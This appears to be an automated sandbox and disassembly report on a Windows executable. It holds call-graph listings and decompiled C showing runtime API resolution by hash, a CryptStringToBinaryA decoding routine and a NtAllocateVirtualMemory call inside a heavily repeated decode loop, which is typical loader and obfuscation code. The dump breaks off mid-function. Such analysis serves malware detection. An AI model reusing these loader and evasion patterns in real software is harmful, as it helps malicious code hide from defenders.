402b4f 29187->29188 29189 401d2e 51 API calls 29188->29189 29190 402b56 29189->29190 29191 402141 51 API calls 29190->29191 29192 402b5c 29191->29192 29193 401d2e 51 API calls 29192->29193 29194 402b63 29193->29194 29195 402141 51 API calls 29194->29195 29196 402b69 29195->29196 29197 401d2e 51 API calls 29196->29197 29198 402b70 29197->29198 29199 402141 51 API calls 29198->29199 29200 402b76 29199->29200 29201 401d2e 51 API calls 29200->29201 29202 402b7d 29201->29202 29203 402141 51 API calls 29202->29203 29204 402b83 29203->29204 29205 401d2e 51 API calls 29204->29205 29206 402b8d 29205->29206 29207 402141 51 API calls 29206->29207 29208 402b93 29207->29208 29209 401d2e 51 API calls 29208->29209 29210 402b9a 29209->29210 29211 402141 51 API calls 29210->29211 29212 402ba0 29211->29212 29213 401d2e 51 API calls 29212->29213 29214 402ba7 29213->29214 29215 402141 51 API calls 29214->29215 29216 402bad 29215->29216 29217 401d2e 51 API calls 29216->29217 29218 402bb4 29217->29218 29219 402141 51 API calls 29218->29219 29220 402bba 29219->29220 29221 401d2e 51 API calls 29220->29221 29222 402bc1 29221->29222 29223 402141 51 API calls 29222->29223 29224 402bc7 29223->29224 29225 401d2e 51 API calls 29224->29225 29226 402bce 29225->29226 29227 402141 51 API calls 29226->29227 29228 402bd7 29227->29228 29229 401d2e 51 API calls 29228->29229 29230 402bde 29229->29230 29231 402141 51 API calls 29230->29231 29232 402be4 29231->29232 29233 401d2e 51 API calls 29232->29233 29234 402beb 29233->29234 29235 402141 51 API calls 29234->29235 29236 402bf1 29235->29236 29237 401d2e 51 API calls 29236->29237 29238 402bf8 29237->29238 29239 402141 51 API calls 29238->29239 29240 402bfe 29239->29240 29241 401d2e 51 API calls 29240->29241 29242 402c05 29241->29242 29243 402141 51 API calls 29242->29243 29244 402c0b 29243->29244 29245 401d2e 51 API calls 29244->29245 29246 402c12 29245->29246 29247 402141 51 API calls 29246->29247 29248 402c18 29247->29248 29249 401d2e 51 API calls 29248->29249 29250 402c22 29249->29250 29251 402141 51 API calls 29250->29251 29252 402c28 29251->29252 29253 401d2e 51 API calls 29252->29253 29254 402c2f 29253->29254 29255 402141 51 API calls 29254->29255 29256 402c35 29255->29256 29257 401d2e 51 API calls 29256->29257 29258 402c3c 29257->29258 29259 402141 51 API calls 29258->29259 29260 402c42 29259->29260 29261 401d2e 51 API calls 29260->29261 29262 402c49 29261->29262 29263 402141 51 API calls 29262->29263 29264 402c4f 29263->29264 29265 401d2e 51 API calls 29264->29265 29266 402c56 29265->29266 29267 402141 51 API calls 29266->29267 29268 402c5c 29267->29268 29269 401d2e 51 API calls 29268->29269 29270 402c63 29269->29270 29271 402141 51 API calls 29270->29271 29272 402c6c 29271->29272 29273 401d2e 51 API calls 29272->29273 29274 402c73 29273->29274 29275 402141 51 API calls 29274->29275 29276 402c79 29275->29276 29277 401d2e 51 API calls 29276->29277 29278 402c80 29277->29278 29279 402141 51 API calls 29278->29279 29280 402c86 29279->29280 29281 401d2e 51 API calls 29280->29281 29282 402c8d 29281->29282 29283 402141 51 API calls 29282->29283 29284 402c93 29283->29284 29285 401d2e 51 API calls 29284->29285 29286 402c9a 29285->29286 29287 402141 51 API calls 29286->29287 29288 402ca0 29287->29288 29289 401d2e 51 API calls 29288->29289 29290 402ca7 29289->29290 29291 402141 51 API calls 29290->29291 29292 402cad 29291->29292 29293 401d2e 51 API calls 29292->29293 29294 402cb7 29293->29294 29295 402141 51 API calls 29294->29295 29296 402cbd 29295->29296 29297 401d2e 51 API calls 29296->29297 29298 402cc4 29297->29298 29299 402141 51 API calls 29298->29299 29300 402cca 29299->29300 29301 401d2e 51 API calls 29300->29301 29302 402cd1 29301->29302 29303 402141 51 API calls 29302->29303 29304 402cd7 29303->29304 29305 401d2e 51 API calls 29304->29305 29306 402cde 29305->29306 29307 402141 51 API calls 29306->29307 29308 402ce4 29307->29308 29309 401d2e 51 API calls 29308->29309 29310 402ceb 29309->29310 29311 402141 51 API calls 29310->29311 29312 402cf1 29311->29312 29313 401d2e 51 API calls 29312->29313 29314 402cf8 29313->29314 29315 402141 51 API calls 29314->29315 29316 402d01 29315->29316 29317 401d2e 51 API calls 29316->29317 29318 402d08 29317->29318 29319 402141 51 API calls 29318->29319 29320 402d0e 29319->29320 29321 401d2e 51 API calls 29320->29321 29322 402d15 29321->29322 29323 402141 51 API calls 29322->29323 29324 402d1b 29323->29324 29325 401d2e 51 API calls 29324->29325 29326 402d22 29325->29326 29327 402141 51 API calls 29326->29327 29328 402d28 29327->29328 29329 401d2e 51 API calls 29328->29329 29330 402d2f 29329->29330 29331 402141 51 API calls 29330->29331 29332 402d35 29331->29332 29333 401d2e 51 API calls 29332->29333 29334 402d3c 29333->29334 29335 402141 51 API calls 29334->29335 29336 402d42 29335->29336 29337 401d2e 51 API calls 29336->29337 29338 402d4c 29337->29338 29339 402141 51 API calls 29338->29339 29340 402d52 29339->29340 29341 401d2e 51 API calls 29340->29341 29342 402d59 29341->29342 29343 402141 51 API calls 29342->29343 29344 402d5f 29343->29344 29345 401d2e 51 API calls 29344->29345 29346 402d66 29345->29346 29347 402141 51 API calls 29346->29347 29348 402d6c 29347->29348 29349 401d2e 51 API calls 29348->29349 29350 402d73 29349->29350 29351 402141 51 API calls 29350->29351 29352 402d79 29351->29352 29353 401d2e 51 API calls 29352->29353 29354 402d80 29353->29354 29355 402141 51 API calls 29354->29355 29356 402d86 29355->29356 29357 401d2e 51 API calls 29356->29357 29358 402d8d 29357->29358 29359 402141 51 API calls 29358->29359 29360 402d96 29359->29360 29361 401d2e 51 API calls 29360->29361 29362 402d9d 29361->29362 29363 402141 51 API calls 29362->29363 30379->28414 30381 401a28 __EH_prolog 30380->30381 30400 401892 30381->30400 30383 401a58 30383->28445 30387 401925 30386->30387 30388 401936 30386->30388 30409 401878 37 API calls 30387->30409 30390 401c87 30388->30390 30392 401c91 __EH_prolog 30390->30392 30391 401cb8 30410 4018b6 30391->30410 30392->30391 30394 40199c 37 API calls 30392->30394 30394->30391 30395 401cc3 30395->28454 30397 401941 30396->30397 30398 40194e 30397->30398 30416 42147b 30397->30416 30398->28445 30401 4018b0 30400->30401 30402 4018a8 30400->30402 30401->30383 30404 40199c 30401->30404 30408 42044e EnterCriticalSection std::locale::facet::_Incref 30402->30408 30405 4019af 30404->30405 30406 40191e 37 API calls 30405->30406 30407 4019d0 30406->30407 30407->30383 30408->30401 30409->30388 30411 4018cd 30410->30411 30412 4018c5 30410->30412 30411->30395 30415 421d28 LeaveCriticalSection 30412->30415 30414 42045e 30414->30395 30415->30414 30417 421485 __EH_prolog 30416->30417 30420 4214f6 30417->30420 30421 4214da 30417->30421 30427 42149c std::runtime_error::~runtime_error 30417->30427 30419 421609 30419->30398 30440 401a7a 37 API calls 3 library calls 30420->30440 30432 4228af 30421->30432 30424 421504 30441 421363 37 API calls 2 library calls 30424->30441 30426 42150f 30426->30427 30428 4215b4 30426->30428 30442 422863 48 API calls 2 library calls 30426->30442 30443 421152 37 API calls 2 library calls 30426->30443 30444 412f8a 36 API calls 2 library calls 30427->30444 30428->30427 30429 4228af 48 API calls 30428->30429 30429->30427 30433 4228bb ___initmbctable 30432->30433 30445 41ccfb 30433->30445 30435 4228c4 30436 4228ce 30435->30436 30451 417b7f 30435->30451 30463 4228ff LeaveCriticalSection LeaveCriticalSection ctype 30436->30463 30439 4228f3 ___initmbctable 30439->30427 30440->30424 30441->30426 30442->30426 30443->30426 30444->30419 30446 41cd08 30445->30446 30447 41cd1f EnterCriticalSection 30445->30447 30446->30447 30448 41cd0f 30446->30448 30447->30435 30464 4148f8 36 API calls __lock 30448->30464 30450 41cd1d 30450->30435 30453 417b95 _write_multi_char 30451->30453 30460 417c1c 30451->30460 30452 417bf3 30454 417c61 30452->30454 30455 417bfd 30452->30455 30453->30452 30453->30460 30465 41cbca 36 API calls __getbuf 30453->30465 30468 41cb1f 44 API calls 3 library calls 30454->30468 30457 417c14 30455->30457 30461 417c21 30455->30461 30466 41cb1f 44 API calls 3 library calls 30457->30466 30460->30436 30461->30460 30467 41c8a6 40 API calls 3 library calls 30461->30467 30463->30439 30464->30450 30465->30452 30466->30460 30467->30460 30468->30460 30470 401f17 __EH_prolog 30469->30470 30471 401a1e 38 API calls 30470->30471 30472 401f33 30471->30472 30473 401f50 30472->30473 30474 401939 49 API calls 30472->30474 30475 40191e 37 API calls 30473->30475 30474->30473 30476 401f94 30475->30476 30477 401c87 38 API calls 30476->30477 30478 401fa0 30477->30478 30478->28457 30480 402052 ctype 30479->30480 30481 402074 30480->30481 30482 402056 30480->30482 30486 401cd0 30481->30486 30484 401fb3 ctype 37 API calls 30482->30484 30485 402072 std::runtime_error::~runtime_error std::_Locinfo::_Getctype 30484->30485 30485->28462 30487 401ce2 30486->30487 30488 401cdd 30486->30488 30491 401cf2 std::runtime_error::~runtime_error 30487->30491 30492 401ae6 30487->30492 30496 4205cc 37 API calls 2 library calls 30488->30496 30491->30485 30493 401af0 __EH_prolog 30492->30493 30497 424440 36 API calls __getbuf 30493->30497 30495 401b40 std::runtime_error::~runtime_error std::_Locinfo::_Getctype 30495->30491 30496->30487 30497->30495 30499 403b94 std::runtime_error::~runtime_error 30498->30499 30500 401fb3 ctype 37 API calls 30499->30500 30501 403ba3 30500->30501 30502 403bc6 30501->30502 30503 403bd2 _strlen 30502->30503 30506 4020b1 30503->30506 30505 403bdf 30505->28469 30507 4020c1 ctype 30506->30507 30508 4020e3 30507->30508 30509 4020c5 30507->30509 30510 4020f5 30508->30510 30516 4205cc 37 API calls 2 library calls 30508->30516 30515 401e78 37 API calls 3 library calls 30509->30515 30512 401cd0 ctype 37 API calls 30510->30512 30514 4020e1 std::runtime_error::~runtime_error std::_Locinfo::_Getctype 30510->30514 30512->30514 30514->30505 30515->30514 30516->30510 30518->28479 30519->28481 30525 4016af 30520->30525 30521 4016c8 30521->28485 30525->30521 30526 4122b3 30525->30526 30540 4015f9 30525->30540 30544 40159e 30525->30544 30527 4122bf ___initmbctable 30526->30527 30548 416254 GetLastError FlsGetValue 30527->30548 30529 4122c9 30530 4122dc 30529->30530 30569 415a16 36 API calls 3 library calls 30529->30569 30533 4122e8 ___initmbctable 30530->30533 30558 4154d2 58 API calls 6 library calls 30530->30558 30533->30525 30534 41232e _fast_error_exit 30534->30533 30535 412382 30534->30535 30536 412247 __getbuf 36 API calls 30534->30536 30538 4123a7 30535->30538 30570 4154d2 58 API calls 6 library calls 30535->30570 30536->30535 30538->30533 30559 412a4d 30538->30559 30541 401606 _fast_error_exit 30540->30541 30542 412247 __getbuf 36 API calls 30541->30542 30543 40161c _TranslateName 30542->30543 30543->30525 30545 4015ab _fast_error_exit _strlen 30544->30545 30546 412247 __getbuf 36 API calls 30545->30546 30547 4015c1 _TranslateName 30546->30547 30547->30525 30549 416270 30548->30549 30550 4162b9 SetLastError 30548->30550 30571 4146ea 30549->30571 30550->30529 30552 41627c 30553 4162b1 30552->30553 30554 416284 FlsSetValue 30552->30554 30578 412d15 36 API calls _fast_error_exit 30553->30578 30554->30553 30555 416295 GetCurrentThreadId 30554->30555 30555->30550 30557 4162b8 30557->30550 30558->30534 30561 412a59 ___initmbctable 30559->30561 30560 412ab8 ___initmbctable 30560->30533 30561->30560 30568 412a95 30561->30568 30582 4148f8 36 API calls __lock 30561->30582 30562 412aaa RtlFreeHeap 30562->30560 30564 412a70 __mtdeletelocks 30565 412a8a 30564->30565 30583 414a07 VirtualFree VirtualFree HeapFree __shift 30564->30583 30584 412aa0 LeaveCriticalSection __lock 30565->30584 30568->30560 30568->30562 30569->30530 30570->30538 30572 4146f6 __getbuf ___initmbctable _TranslateName 30571->30572 30573 414763 RtlAllocateHeap 30572->30573 30575 41478f ___initmbctable 30572->30575 30579 4148f8 36 API calls __lock 30572->30579 30580 4151bb 5 API calls _TranslateName 30572->30580 30581 414794 LeaveCriticalSection __lock 30572->30581 30573->30572 30575->30552 30578->30557 30579->30572 30580->30572 30581->30572 30582->30564 30583->30565 30584->30568 30585 41cc3e 30586 41cc4b 30585->30586 30587 4146ea _TranslateName 36 API calls 30586->30587 30588 41cc65 30587->30588 30589 41cc7e 30588->30589 30590 4146ea _TranslateName 36 API calls 30588->30590 30590->30589

                                                                              Executed Functions

                                                                              Function 00401784, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1222 401784-401790 1223 401792-401794 1222->1223 1224 401796-4017bd LoadLibraryW GetProcAddress 1222->1224 1225 401807-401809 1223->1225 1226 4017c2-4017c4 1224->1226 1227 4017c6-4017c8 1226->1227 1228 4017ca-4017dc call 412247 1226->1228 1229 401806 1227->1229 1232 4017e2-401802 call 412140 1228->1232 1233 4017de-4017e0 1228->1233 1229->1225 1234 401805 1232->1234 1233->1234 1234->1229
                                                                              C-Code - Quality: 20%
                                                                              			E00401784(intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _v28;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t13;
				intOrPtr _t17;
				signed int _t20;
				intOrPtr* _t23;
				intOrPtr* _t30;

				if(_a12 != 0) {
					_t12 = LoadLibraryW(L"CRYPT32.DLL"); // executed
					_t13 = GetProcAddress(_t12, "CryptStringToBinaryA");
					_t30 = _a8;
					_push(0);
					_push(0);
					_push(_t30);
					_push(0);
					_push(1);
					_push(_a16);
					_v28 = _t13;
					_push(_a12);
					if( *_t13() != 0) {
						_t17 = E00412247( *_t30 + 1);
						_t23 = _a4;
						 *_t23 = _t17;
						if(_t17 != 0) {
							E00412140(_t17, 0,  *_t30 + 1);
							_t20 = _v28(_a12, _a16, 1,  *_t23, _t30, 0, 0) & 0xffffff00 | _t19 != 0x00000000;
						} else {
							_t20 = 0;
						}
					} else {
						_t20 = 0;
					}
					return _t20;
				}
				return 0;
			}










                                                                              0x00401790
                                                                              0x004017a1
                                                                              0x004017a8
                                                                              0x004017ae
                                                                              0x004017b1
                                                                              0x004017b2
                                                                              0x004017b3
                                                                              0x004017b4
                                                                              0x004017b5
                                                                              0x004017b7
                                                                              0x004017ba
                                                                              0x004017bd
                                                                              0x004017c4
                                                                              0x004017cf
                                                                              0x004017d6
                                                                              0x004017da
                                                                              0x004017dc
                                                                              0x004017e8
                                                                              0x00401802
                                                                              0x004017de
                                                                              0x004017de
                                                                              0x004017de
                                                                              0x004017c6
                                                                              0x004017c6
                                                                              0x004017c6
                                                                              0x00000000
                                                                              0x00401806
                                                                              0x00000000

                                                                              APIs
                                                                              • LoadLibraryW.KERNELBASE(CRYPT32.DLL,CryptStringToBinaryA), ref: 004017A1
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004017A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: CRYPT32.DLL$CryptStringToBinaryA
                                                                              • API String ID: 2574300362-4003543915
                                                                              • Opcode ID: 7b46f1b4eebd1e785f7fa98b3352991651239896ca68e764a2b4fc20df8f1eb0
                                                                              • Instruction ID: 018b8b139ed1087dfaa6c6f20e5b9f664c90e221dd5b12edc80f544ef9103122
                                                                              • Opcode Fuzzy Hash: 7b46f1b4eebd1e785f7fa98b3352991651239896ca68e764a2b4fc20df8f1eb0
                                                                              • Instruction Fuzzy Hash: 51014571500245BBCF216F62DC8ADEB3FBCEF82711F10002AF900E31A0EAB98850DA75
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040215A, Relevance: 6.1, APIs: 1, Strings: 1, Instructions: 2553COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1244 40215a-4021e6 call 401693 * 8 1262 4021e8-4021f1 1244->1262 1263 40220f-4027ff call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 1244->1263 1266 4021f4-4021f6 1262->1266 1709 402801-402803 1263->1709 1710 402808-402de9 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 1263->1710 1266->1263 1268 4021f8-402209 1266->1268 1268->1263 1273 403b7f-403b82 1268->1273 1711 403b7e 1709->1711 1710->1709 2153 402def-4033b9 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 1710->2153 1711->1273 2593 4033be-4033d0 2153->2593 2594 4033d6-4033d8 2593->2594 2594->1709 2595 4033de-4039c4 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 2594->2595 3036 4039c8-4039d2 NtAllocateVirtualMemory 2595->3036 3037 4039d8-403b7b call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 call 401d2e call 402141 3036->3037 3037->1711
                                                                              C-Code - Quality: 60%
                                                                              			E0040215A(intOrPtr _a4, char _a8, intOrPtr _a12) {
				char _v8;
				void* _v12;
				char _v16;
				long _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v72;
				intOrPtr _v76;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t492;
				signed int _t999;
				void* _t1002;
				void* _t1004;
				intOrPtr* _t1009;
				void* _t1011;
				intOrPtr* _t1012;

				_v12 = 0;
				_v20 = _a8;
				_t39 = E00401693(0xb501f44f); // executed
				_v44 = _t39;
				 *_t1012 = 0x6e4a8109; // executed
				_t40 = E00401693(); // executed
				_v72 = _t40;
				_v76 = E00401693(0xdeab3bad);
				_t42 = E00401693(0x314ddd2f); // executed
				_t1009 = _t42; // executed
				_t43 = E00401693(0x7ec5b1a5); // executed
				_v40 = _t43;
				_t44 = E00401693(0xdc0a3126); // executed
				_v36 = _t44;
				_t45 = E00401693(0xb3089a5a); // executed
				_v32 = _t45;
				_t46 = E00401693(0x46b87f17); // executed
				_v28 = _t46;
				_t48 =  *_t1009( &_v8, 0, 0, 1, 0); // executed
				if(_t48 != 0) {
					L3:
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
					_push(0x45a978);
					E00402141(_t1011, E00401D2E(_t1102));
					_push(0x4326f8);
